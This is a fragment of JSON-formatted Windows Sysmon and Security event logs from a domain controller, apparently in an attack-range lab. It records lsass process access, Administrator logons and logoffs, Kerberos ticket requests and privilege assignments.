C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.198","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220617,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80E22\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x80e22","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220618,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x88087\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x88087","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5826,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220619,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220620,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220621,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220622,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x880C7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x880c7","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220623,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x880C7\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x880c7","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5827,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5828,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.323\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.323","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
